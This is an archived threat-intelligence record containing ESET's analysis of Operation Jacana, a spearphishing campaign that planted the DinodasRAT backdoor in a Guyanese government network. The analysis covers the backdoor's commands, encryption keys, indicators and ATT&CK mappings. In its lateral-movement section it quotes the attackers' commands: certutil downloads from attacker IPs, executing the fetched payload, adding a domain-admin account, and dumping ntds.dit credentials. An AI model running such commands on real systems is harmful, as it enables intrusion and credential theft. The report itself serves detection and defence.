{
	"id": "131751d9-ed6f-4cdd-a2dc-97bb4ceac6db",
	"created_at": "2026-04-06T00:06:17.576056Z",
	"updated_at": "2026-04-10T03:36:33.7577Z",
	"deleted_at": null,
	"sha1_hash": "2958e9cbfcb669e800ac5a4b6c4ab6ac40cb010d",
	"title": "Operation Jacana: Foundling hobbits in Guyana",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 640845,
	"plain_text": "Operation Jacana: Foundling hobbits in Guyana\r\nBy Fernando Tavella\r\nArchived: 2026-04-05 12:42:25 UTC\r\nIn February 2023, ESET researchers detected a spearphishing campaign targeting a governmental entity in Guyana. While\r\nwe haven’t been able to link the campaign, which we named Operation Jacana, to any specific APT group, we believe with\r\nmedium confidence that a China-aligned threat group is behind this incident.\r\nIn the attack, the operators used a previously undocumented C++ backdoor that can exfiltrate files, manipulate Windows\r\nregistry keys, execute CMD commands, and more. We named the backdoor DinodasRAT based on the victim identifier it\r\nsends to its C\u0026C: the string always begins with Din, which reminded us of the hobbit Dinodas from the Lord of the Rings.\r\nKey points of this blogpost:\r\nOperation Jacana is a targeted cyberespionage campaign against a Guyanese governmental entity.\r\nAfter the initial compromise via spearphishing emails, the attackers proceeded to move laterally through\r\nthe victim’s internal network.\r\nTo extract sensitive data, the operators used a previously undocumented backdoor we named DinodasRAT.\r\nDinodasRAT encrypts the information it sends to the C\u0026C using the Tiny Encryption Algorithm (TEA).\r\nApart from DinodasRAT, the attackers also deployed Korplug, leading us to suspect that China-aligned\r\noperators are behind this operation.\r\nThis campaign was targeted, as the threat actors crafted their emails specifically to entice their chosen victim organization.\r\nAfter successfully compromising the first couple of machines with DinodasRAT, the operators proceeded to move laterally\r\nand breach the target’s internal network, where they again deployed the DinodasRAT backdoor, along with additional\r\nmalicious tools, among them a variant of Korplug (aka PlugX). The overview of the compromise flow in Operation Jacana is\r\nshown in Figure 1.\r\nFigure 1. 
Operation Jacana compromise flow\r\nAttribution\r\nAs of this writing, we have not been able to attribute Operation Jacana to any known group. However, thanks to a clue we\r\nfound, we feel that we aren’t completely in the dark regarding the perpetrators. During the attack, the threat actors deployed\r\na variant of Korplug (aka PlugX), which is common to China-aligned groups – for example, Mustang Panda’s Hodur: Old\r\ntricks, new Korplug variant.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 1 of 12\n\nWhile our attribution to a China-aligned threat actor is made with only medium confidence, the hypothesis is further\r\nsupported by recent developments in Guyana–China diplomatic relations. In February 2023, the same month that Operation\r\nJacana occurred, the Special Organised Crime Unit (SOCU) of Guyana arrested three people in a money laundering\r\ninvestigation involving Chinese companies, an act disputed by the local Chinese embassy. Additionally, as part of the Belt\r\nand Road Initiative, China has economic interests in Guyana. \r\nInitial Access\r\nAs the first step in breaching their victim’s network, the threat actors behind Operation Jacana sent the target organization\r\nspearphishing emails referencing Guyanese public affairs. We observed the following subject lines:\r\nPresident Mohamed Irfaan Ali's Official Visit to Nassau, The Bahamas\r\nGuyanese fugitive in Vietnam\r\nBased on the email subjects, the operators must have been following the political goings-on in Guyana – the time we\r\nregistered new detections at the targeted governmental entity coincided with the Guyanese president’s attendance of the\r\nCARICOM conference in Nassau.\r\nThe spearphishing emails contained a link that, when clicked, downloaded a ZIP file from\r\nhttps://fta.moit.gov[.]vn/file/people.zip. 
Since a domain ending with gov.vn indicates a Vietnamese governmental website,\r\nwe believe that the operators were able to compromise another governmental entity and use it to host their malware samples.\r\nWe have notified the VNCERT about the compromised infrastructure.\r\nOnce the victim extracted the ZIP file, which wasn’t password protected, and launched the contained executable, they\r\nbecame compromised with the DinodasRAT malware. The extracted filenames are related to the phishing email subject\r\nlines:\r\nGuyanese fugitive in Vietnam20220101to20230214Guyanese fugitive in Vietnam.docx.exe\r\nThe Bahamas/President Mohamed Irfaan Ali’s Official Visit to Nassau, The Bahamas.doc.exe\r\nLateral Movement\r\nAfter breaching their target, the attackers proceeded to move across the victim’s internal network. According to our\r\ntelemetry, BAT/Impacket.M and related detections were triggered in the network, which points to the use of Impacket, or a\r\nsimilar WMI-based lateral movement tool. \r\nSome of the commands the attackers executed on the network include:\r\ncertutil -urlcache -split http://23.106.123[.]166/vmtools.rar\r\nnet user test8 Test123.. /add /do\r\nnet group \"domain admins\" test8 /add /do\r\ncertutil -urlcache -split -f http://23.106.122[.]5/windowsupdate.txt c:\\programdata\\windowsupdate.txt\r\ncd c:\\programdata\\\r\nc:\\programdata\\windowsupdate.exe\r\npowershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q\"\r\nThe last command dumps ntds.dit using the LOLBin ntdsutil.exe. This enables dumping passwords stored on a Windows\r\nserver.\r\nDinodasRAT\r\nDinodasRAT is a previously undocumented remote access trojan developed in C++ with various capabilities that allow an\r\nattacker to spy on and collect sensitive information from a victim’s computer. \r\nWhen executed, the malware first checks whether three arguments were passed. 
If present, these arguments must contain the\r\nfollowing information in the following order:\r\n1. the letter d,\r\n2. a number, which is a process ID, and\r\n3. a full file path.\r\nIf all three arguments were passed, DinodasRAT terminates the process represented by the process ID using the Windows\r\nAPI TerminateProcess then uses the Windows API DeleteFileW to delete the file passed in the third argument. After this, the\r\nprocess stops its execution by using the C++ standard library exit function. This is most likely intended as an uninstall\r\nfunction.\r\nIf no arguments were passed, DinodasRAT continues its execution by creating a mutex named client and checks for the\r\nexistence of the conventional Windows directory C:\\ProgramData. If it exists, the malware creates a subdirectory named\r\nApplication Doc, which is used to allocate a configuration file and other files related to the backdoor. In case the Windows\r\ndirectory doesn’t exist, DinodasRAT creates a path in the root directory called Program.Files\\Application.Doc. The strings\r\nApplication Doc, ProgramData and Program.Files\\Application.Doc are encrypted using the Tiny Encryption Algorithm\r\n(TEA).\r\nThe Application Doc directory is created with the attributes Read-only and Hidden. Inside of Application Doc, DinodasRAT\r\ncreates two subdirectories, named 0 and 1. Once the directory exists, the malware spawns three threads used for data\r\ncollection and exfiltration. A detailed description of their behavior is given in Table 1.\r\nTable 1. Thread descriptions\r\nThread Description\r\n1\r\nTake a screenshot of the display of the victim’s machine every five minutes using Windows API functions\r\nlike CreateDCW, BitBlt, DeleteDC, or ReleaseDC. 
The screenshot is compressed and saved in the\r\nsubdirectory Application Doc\\0.\r\nIn order to compress the screenshot, the attackers use the zlib library, version 1.2.11.\r\nThe format of the filename used for the saved screenshots is the following:\r\n\u003cYYYYMMDDHHMMSS\u003e_\u003cfive random digits\u003e_\u003cone random digit\u003e.jpg\r\n2\r\nGet the content of the clipboard every five minutes using the Windows API function GetClipboardData and\r\nsave it in the subdirectory Application Doc\\1.\r\nThe format of the filename used for the clipboard data file is the following: DateTimeStamp_\u003cfive random\r\ndigits\u003e_\u003cone random digit\u003e.txt\r\n3\r\nLoops through the subdirectories 0 and 1 and sends the filenames, encrypted with TEA and base64 encoded,\r\nto the C\u0026C server. If the C\u0026C server replies, it creates another packet in order to send the filename with its\r\ndata. Finally, it deletes the file from the victim’s machine.\r\nAfter the threads are spawned, DinodasRAT creates a file named conf.ini in the main directory. This file contains an ID used\r\nto identify the victim to the C\u0026C server. \r\nFigure 2 shows an example of the ID saved in the conf.ini file.\r\nFigure 2. Example of an ID saved in the conf.ini file\r\nThe format of the ID is Din_\u003cYYYYMMDD\u003e_\u003cMD5-HASH\u003e_\u003cRANDOM-VALUE\u003e_V1, where:\r\n\u003cYYYYMMDD\u003e is the install date,\r\n\u003cMD5-HASH\u003e is calculated using the IP address of the victim and the install date in milliseconds,\r\n\u003cRANDOM-VALUE\u003e is a random value, and\r\nV1 is probably the malware version.\r\nTEA: Tiny Encryption Algorithm\r\nDinodasRAT uses TEA to decrypt some of its strings, as well as to encrypt/decrypt data sent to, or received from, its C\u0026C\r\nserver. 
TEA, or Tiny Encryption Algorithm, is a simple block cipher, noted for its ease of implementation in software and\r\nhardware. For example, the original reference implementation of its encode function comprises just a few lines of C code,\r\nwith a very short setup time and no tables of preset values. DinodasRAT employs the algorithm in the cipher-block chaining\r\n(CBC) mode. In some cases, the encrypted data is further encoded with base64 before being sent to the C\u0026C server.\r\nWe found that the malware contains three different keys used for different encryption/decryption scenarios, as described in\r\nTable 2.\r\nTable 2. TEA keys used by DinodasRAT\r\nKey N Value Description\r\n1\r\nA1 A1 18 AA 10 F0 FA 16 06 71\r\nB3 08 AA AF 31 A1\r\nUsed mainly to encrypt/decrypt communications with the C\u0026C server.\r\n2\r\nA0 21 A1 FA 18 E0 C1 30 1F 9F\r\nC0 A1 A0 A6 6F B1\r\nUsed to encrypt the name of the files created in the screenshot\r\nfunctionality, before they are sent to the C\u0026C server.\r\n3\r\n11 0A A8 E1 C0 F0 FB 10 06 71\r\nF3 18 AC A0 6A AF\r\nUsed to decrypt the installation paths.\r\nIt is possible that the attackers chose to use TEA in order to make the job easier for themselves – we have reason to believe\r\nthat the malware’s implementation of the algorithm is not created from scratch, but that it could be adapted from\r\nBlackFeather’s blogpost Tea Algorithm - C++. \r\nC\u0026C communication and malicious activity\r\nIn order to communicate with the C\u0026C server, DinodasRAT uses the Winsock library to create a socket that uses the TCP\r\nprotocol. Although TCP is the default protocol used to send and receive information from the C\u0026C server, we have seen that\r\nDinodasRAT is capable of changing to the UDP protocol.\r\nThe backdoor also creates various threads for different purposes, such as manipulating a received command to execute on\r\nthe victim’s machine. 
Hence, in order to maintain synchronized communication, DinodasRAT makes use of Windows event\r\nobjects by using Windows API functions like CreateEventW, SetEventW, and WaitForSingleObject.\r\nTo start the main communication with the C\u0026C server, DinodasRAT sends a packet with basic information about the\r\nvictim’s machine and its configuration, such as:\r\nWindows version,\r\nOS architecture,\r\nusername,\r\nmalware execution path encoded in base64, and\r\na value used for the UDP protocol, which by default is 800.\r\nFigure 3 shows not only basic information collected about the victim, but also the ID generated by the malware, which\r\nserves as a victim identifier for the C\u0026C server.\r\nFigure 3. Basic information before its encryption\r\nAll the information that DinodasRAT sends to the C\u0026C server via the TCP protocol is TEA encrypted. In addition to that,\r\nsome of the information is also base64 encoded.\r\nTo send the stolen information to the C\u0026C server, DinodasRAT crafts a packet containing the following:\r\nFirst byte: an ID possibly to indicate whether the data is TEA encrypted (0x30) or base64 encoded and TEA\r\nencrypted (0x32).\r\nNext DWORD: encrypted data size.\r\nRemaining bytes: encrypted data.\r\nFigure 4 shows an example of an encrypted packet to be sent to the C\u0026C server.\r\nFigure 4. 
Example of an encrypted packet\r\nDuring our analysis we were unable to obtain a response from the C\u0026C server, but we were able to determine that any\r\npackets received from the server should also be encrypted with TEA.\r\nWhen it comes to handling commands received from the C\u0026C server, DinodasRAT creates a thread with an infinite loop\r\nresponsible for receiving and determining whether packets contain encrypted commands to execute.\r\nA packet, once decrypted, contains the following structure:\r\nFirst DWORD: ID of action to perform, hex value (see Table 2).\r\nSecond DWORD: another ID, indicating on the client side that this packet carries a command value (in hex) to\r\nexecute on the victim’s machine.\r\nRest of the packet: data used by the command to execute.\r\nDinodasRAT contains commands capable of performing various actions on a victim’s machine or on the malware itself.\r\nTable 3 lists the supported commands with a short description of each. \r\nTable 3. DinodasRAT commands\r\nCommand ID Description\r\n0x02 List the contents of a specific directory.\r\n0x03 Delete a file or the content of a directory.\r\n0x04 Change the attribute of a file to hidden or normal.\r\n0x05 Send files to the C\u0026C server.\r\n0x06 Set an event object used for command 0x05.\r\n0x08 Modify a binary file with bytes received from the C\u0026C server or execute a command using CreateProcessW.\r\n0x09 Set an event object used for command 0x08.\r\n0x0D Write a variable called va, with its value, in the conf.ini file.\r\n0x0E Enumerate running processes.\r\n0x0F Terminate a process by its process ID.\r\n0x10 List services on the victim’s machine.\r\n0x11 Start or delete a service.\r\n0x12 Get info from a Windows registry key.\r\n0x13 Delete a Windows registry key.\r\n0x14 Create a Windows registry key.\r\n0x15 Execute a file or a command using the 
CreateProcessW Windows API.\r\n0x16 Execute a command using the CreateProcessW Windows API.\r\n0x17 Receive a domain and execute nslookup with that domain to create another socket with the IP address.\r\n0x18 Receive and execute a command using Windows APIs CreateProcessW, PeekNamedPipe, and ReadFile.\r\n0x19 Same as command 0x18.\r\n0x1A Set an event object used for commands 0x18, 0x19, and 0x1B.\r\n0x1B Interactive reverse shell.\r\n0x1D File manipulation; rename, copy, move files, etc.\r\n0x1E Set the string ok to a global variable and send that value to the C\u0026C server.\r\n0x1F Write a variable called mode with its value into the conf.ini file.\r\n0x20 Write a variable called ptype with its value into the conf.ini file.\r\n0x21 Get or set a variable called fmode with its value in the conf.ini file.\r\n0x22 Terminate malware execution.\r\n0x24 Write the variables s and sub, with their respective values, into a file named p.ini. 
Both variables can\r\nhave a Boolean value of true or false.\r\n0x25 Configure the event and global variables related to the screenshot thread.\r\n0x26 Write a variable called c with its value into a file named p.ini.\r\n0x29 Modify the value of a global variable used for the UDP protocol, default value 0x800.\r\nDuring our investigation we have seen only the creation and use of the ID variable with its respective value in the conf.ini\r\nfile, which is used to identify the victim to the C\u0026C server.\r\nAdditionally, DinodasRAT makes use of a multipurpose global variable which, for example, can contain the path of a\r\nfilename to be deleted or the name of a Windows registry subkey to create.\r\nOther malware samples\r\nThe attackers also used other tools apart from DinodasRAT during the intrusion:\r\nA variant of Korplug (aka PlugX) – A backdoor typically used by China-aligned threat groups.\r\nA SoftEther VPN client. This was probably used to proxy local ports, such as RDP, to the C\u0026C server.\r\nConclusion\r\nOperation Jacana is a cyberespionage campaign that impacted a governmental entity in Guyana. We believe with medium\r\nconfidence that it was conducted by a China-aligned APT group.\r\nThe attackers used a combination of previously unknown tools, such as DinodasRAT, and more traditional backdoors such\r\nas Korplug.\r\nBased on the spearphishing emails used to gain initial access to the victim’s network, the operators are keeping track of the\r\ngeopolitical activities of their victims to increase the likelihood of their operation's success.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. 
For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nA list of IoCs can also be found in our GitHub repository. \r\nFiles\r\nSHA-1 Filename ESET detection name Descr\r\n599EA9B26581EBC7B4BDFC02E6C792B6588B751E President Mohamed Irfaan Ali's Official Visit to Nassau, The Bahamas.doc.exe Win32/DinodasRAT.A Dinod\r\nEFD1387BB272FFE75EC9BF5C1DD614356B6D40B5 people.zip Win32/DinodasRAT.A ZIP fi conta Dinod\r\n9A6E803A28D27462D2DF47B52E34120FB2CF814B President Mohamed Irfaan Ali's Official Visit to Nassau, The Bahamas.exe Win32/DinodasRAT.B Dinod\r\n33065850B30A7C797A9F1E5B219388C6991674DB 114.exe Win32/DinodasRAT.B Dinod\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n23.106.122[.]5 N/A Leaseweb Asia Pacific pte. ltd. 2023‑03‑29 Hosts other malicious components.\r\n23.106.122[.]46 N/A IRT-LSW-SG 2023‑02‑13 Hosts other malicious components.\r\n23.106.123[.]166 N/A Leaseweb Asia Pacific pte. ltd. 2023‑02‑15 Hosts other malicious components.\r\n42.119.111[.]97 fta.moit.gov[.]vn FPT Telecom Company 2023‑02‑13 Hosts DinodasRAT in a compressed file.\r\n115.126.98[.]204 N/A Forewin Telecom Group Limited, ISP at, HK 2023‑05‑08 C\u0026C server for DinodasRAT.\r\n118.99.6[.]202 N/A Edward Poon 2023‑02‑02 C\u0026C server for DinodasRAT.\r\n199.231.211[.]19 update.microsoft-setting[.]com Dash Networks Inc. 
2022‑11‑07 C\u0026C server for DinodasRAT.\r\nMITRE ATT\u0026CK techniques\r\nTactic ID Name Description\r\nResource Development T1583.003 Acquire Infrastructure: Virtual Private Server Operators have used VPS servers for hosting their payloads.\r\nT1587.001 Develop Capabilities: Malware Operators made custom malware for the operation.\r\nT1608.001 Stage Capabilities: Upload Malware Operators have used servers to upload malware.\r\nT1584.004 Compromise Infrastructure: Server Operators have compromised servers to host their payloads.\r\nT1588.001 Obtain Capabilities: Malware Operators have used a variant of the Korplug backdoor in this operation.\r\nT1588.002 Obtain Capabilities: Tool Operators have used tools such as Impacket and SoftEther.\r\nInitial Access T1566.002 Phishing: Spearphishing Link Operators made use of scheduled tasks to persist their malware.\r\nExecution T1059.001 Command and Scripting Interpreter: PowerShell Operators have used PowerShell to execute commands on the victim’s network.\r\nT1059.003 Command and Scripting Interpreter: Windows Command Shell Operators have used Windows command shell to execute commands on the victim’s internal network.\r\nT1059.005 Command and Scripting Interpreter: Visual Basic Operators have used VBScripts.\r\nT1106 Native API DinodasRAT uses APIs, e.g., CreateProcessW, to execute CMD commands on the victim’s machine.\r\nT1204.001 User Execution: Malicious Link Operators have relied on their victims to open a link to download their malware.\r\nT1204.002 User Execution: Malicious File Operators have relied on their victims to execute their malware.\r\nDefense Evasion T1140 Deobfuscate/Decode Files or Information DinodasRAT compresses files before 
they are sent to the C\u0026C server. DinodasRAT also uses TEA to decrypt strings.\r\nT1036.007 Masquerading: Double File Extension Operators have used “double extensions” to trick victims into executing their malware.\r\nT1070.004 Indicator Removal: File Deletion DinodasRAT is capable of self-deletion from the victim’s machine.\r\nT1564.001 Hide Artifacts: Hidden Files and Directories To evade detection, DinodasRAT creates hidden folders.\r\nPersistence T1078.002 Valid Accounts: Domain Accounts Operators have created domain accounts to maintain persistent access to the victim’s internal network.\r\nT1053 Scheduled Task/Job Operators made use of scheduled tasks to persist their malware.\r\nCredential Access T1003.003 OS Credential Dumping: NTDS Operators abused ntdsutil.exe to dump credentials.\r\nDiscovery T1083 File and Directory Discovery DinodasRAT can list the contents of a directory or a file.\r\nT1012 Query Registry DinodasRAT can obtain information from Windows registry keys.\r\nT1057 Process Discovery DinodasRAT can obtain information about the processes running on the victim’s machine.\r\nT1007 System Service Discovery DinodasRAT can obtain information about the services running on the victim’s machine.\r\nT1082 System Information Discovery DinodasRAT retrieves information like Windows version from the victim’s machine.\r\nCollection T1115 Clipboard Data DinodasRAT can obtain information located on the clipboard of the victim’s machine.\r\nT1113 Screen Capture DinodasRAT can take screenshots on the victim’s machine.\r\nCommand and Control T1573.001 Encrypted 
Channel: Symmetric Cryptography DinodasRAT has used TEA for encrypting C\u0026C server communications.\r\nT1095 Non-Application Layer Protocol DinodasRAT has used TCP or UDP protocols for its connection to the C\u0026C server.\r\nT1132 Data Encoding DinodasRAT uses base64 encoding for strings and data sent to its C\u0026C server.\r\nExfiltration T1041 Exfiltration Over C2 Channel DinodasRAT exfiltrates data over the same channel used for its C\u0026C server.\r\nSource: https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/"
	],
	"report_names": [
		"operation-jacana-spying-guyana-entity"
	],
	"threat_actors": [
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61c3f4b4-afd9-4187-91c3-ba6dfeeb6470",
			"created_at": "2023-10-14T02:03:14.355977Z",
			"updated_at": "2026-04-10T02:00:04.811984Z",
			"deleted_at": null,
			"main_name": "Operation Jacana",
			"aliases": [],
			"source_name": "ETDA:Operation Jacana",
			"tools": [
				"Agent.dhwf",
				"Destroy RAT",
				"DestroyRAT",
				"DinodasRAT",
				"Impacket",
				"Kaba",
				"Korplug",
				"PlugX",
				"RedDelta",
				"SoftEther VPN",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"XDealer",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433977,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2958e9cbfcb669e800ac5a4b6c4ab6ac40cb010d.pdf",
		"text": "https://archive.orkl.eu/2958e9cbfcb669e800ac5a4b6c4ab6ac40cb010d.txt",
		"img": "https://archive.orkl.eu/2958e9cbfcb669e800ac5a4b6c4ab6ac40cb010d.jpg"
	}
}